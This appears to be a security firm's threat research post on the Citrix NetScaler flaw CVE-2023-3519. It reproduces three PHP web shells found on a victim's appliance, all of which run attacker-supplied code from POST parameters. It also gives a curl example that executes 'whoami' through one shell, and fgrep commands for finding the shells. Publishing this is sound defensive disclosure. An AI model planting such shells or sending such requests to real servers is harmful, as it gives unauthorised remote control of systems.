
CVE-2023-3519: Stairwell identifies previously unseen attack methods

On July 26th, the Stairwell team identified three PHP files in a customer's environment and conducted additional analysis of them while supporting the customer's investigation of the recent Citrix Netscaler ADC vulnerability (CVE-2023-3519). However, the observed shells and activity did not align with the information provided in the CISA report.

After obtaining permission from the customer, we are sharing these redacted details to increase awareness of a separate set of activities linked to CVE-2023-3519. This sharing is being done while the customer carries out their remediation process. Stairwell would like to extend its gratitude to the Shadowserver Foundation for their collaborative efforts. They have also released information about the related activity, which can be found here: Technical Summary of Observed Citrix CVE-2023-3519 Incidents.

In response to this new activity, the Stairwell team has released a version of Stairwell optimized to run on Citrix appliances such as ADC and Gateway; it is available to customers.

The following details outline the web shells that were automatically flagged as malicious by Stairwell’s Mal-Eval and analyzed by the Stairwell threat research team:

File: /var/netscaler/logon/LogonPoint/uiareas/mac/[redacted].php

<?php
http_response_code(404);

@$_POST['variable1']($_POST['variable2']);

?>

This web shell is triggered by an attacker passing the function name to execute in a parameter named variable1 and arguments in one named variable2. An attacker could leverage this web shell for command execution by passing eval(), as shown in the following example:

curl -X POST \
  "$URL" \
  -d "variable1=eval&variable2=whoami"

Additional functionality beyond remote command execution is possible using this web shell by passing additional PHP code through the variable2 parameter.

Like the first web shell, this one is designed to give an attacker direct remote command execution. Commands for execution are base64 encoded and sent in an HTTP POST request parameter. Two files contained identical PHP, differing only in location, file name, and parameter name.

File: /var/netscaler/logon/LogonPoint/uiareas/linux/[redacted].php

<?php

http_response_code(404);

eval(base64_decode($_POST['variable']));

?>

The third web shell discovered was fundamentally the same code but saved in a different location with a different filename and a different variable.

File: /var/netscaler/logon/LogonPoint/uiareas/mac/[redacted].php

<?php

http_response_code(404);

eval(base64_decode($_POST['variable']));

?>

Check for compromise

Citrix administrators can use the following commands to identify potential copies of this web shell in their environment. These searches are very broad and could identify legitimate files; administrators should evaluate each finding:

fgrep -r 'eval(base64_decode($_POST' /var/netscaler/
fgrep -r 'http_response_code(' /var/netscaler/